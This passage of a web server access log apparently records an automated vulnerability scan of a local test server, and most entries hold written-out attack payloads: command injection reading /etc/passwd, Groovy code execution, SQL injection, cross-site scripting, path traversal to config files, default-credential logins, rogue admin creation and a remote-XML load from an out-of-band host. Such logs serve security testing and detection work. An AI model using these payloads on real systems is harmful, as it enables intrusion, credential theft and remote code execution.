+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /libs/granite/core/content/login/favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}phpinfo();{/dede:field} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"sid=254&pe=1,2,3,4,5&appname=%0a&au=1&username=nsroot","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /menu/stapp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /verify.php?id=1&confirm_hash= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /controller/registry-clients HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/login.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"\x0D\x0A\x0D\x0A find_profile\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A name\x0D\x0A \x0D\x0A *\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /build.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/92 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"Login=admin&Password=12345&Action=AdminLogin&XToken={{token}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /?/Ajax/&q[]=/0/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"{\x22size\x22:1, \x22script_fields\x22: {\x22lupin\x22:{\x22lang\x22:\x22groovy\x22,\x22script\x22: \x22java.lang.Math.class.forName(\x5C\x22java.lang.Runtime\x5C\x22).getRuntime().exec(\x5C\x22cat /etc/passwd\x5C\x22).getText()\x22}}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_search HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /clansphere/mods/clansphere/lang_modvalidate.php?language=language%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&module=module HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"j_username=admin&j_password=security&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mrtg/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xprober.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1","status":"405","body_bytes_sents":"157","req_time":"0.028","http_user_agent":"Nacos-Server", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mdocs-posts/?mdocs-img-preview=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docpicker/internal_proxy/http/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"type='|cat /etc/passwd||'","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /counters HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mantis/verify.php?id=1&confirm_hash= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"email=%27%3D%27%27or%27%40email.com&password=%27%3D%27%27or%27&btn_login=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"http://127.0.0.1/login.php", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"\x0D\x0A\x0D\x0A generate_script\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A {{profile}}\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A /etc/passwd\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"{\x22query\x22:\x22query {\x5Cn nuclei1:__typename \x5Cn nuclei2:__typename \x5Cn nuclei3:__typename \x5Cn nuclei4:__typename \x5Cn nuclei5:__typename \x5Cn nuclei6:__typename \x5Cn }\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SSI/Auth/ip_snmp.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /setup.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/93 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hmc/hybris HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://ca28q98smpvbk9ig07h0dzf4pi8wd79h8.oast.online') HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"j_username=system&j_password=password&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /HyperGraphQL HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"{\x0D\x0A \x22type\x22: \x22user\x22,\x0D\x0A \x22name\x22: \x22poc\x22,\x0D\x0A \x22roles\x22: [\x22_admin\x22],\x0D\x0A \x22roles\x22: [],\x0D\x0A \x22password\x22: \x22123456\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /_users/org.couchdb.user:poc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MRTG/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Gemfile HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?mdocs-img-preview=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wps/PA_WCM_Authoring_UI/proxy/http/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dbaas_monitor/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"nodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40version%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"ant=echo md5(\x22antproxy.php\x22);","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /.antproxy.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /flow/registries HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mantisBT/verify.php?id=1&confirm_hash= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/logout?continue=//example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pem/login/pages/login.jsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/marmoset-viewer/mviewer.php?id=http:// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /run.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:56 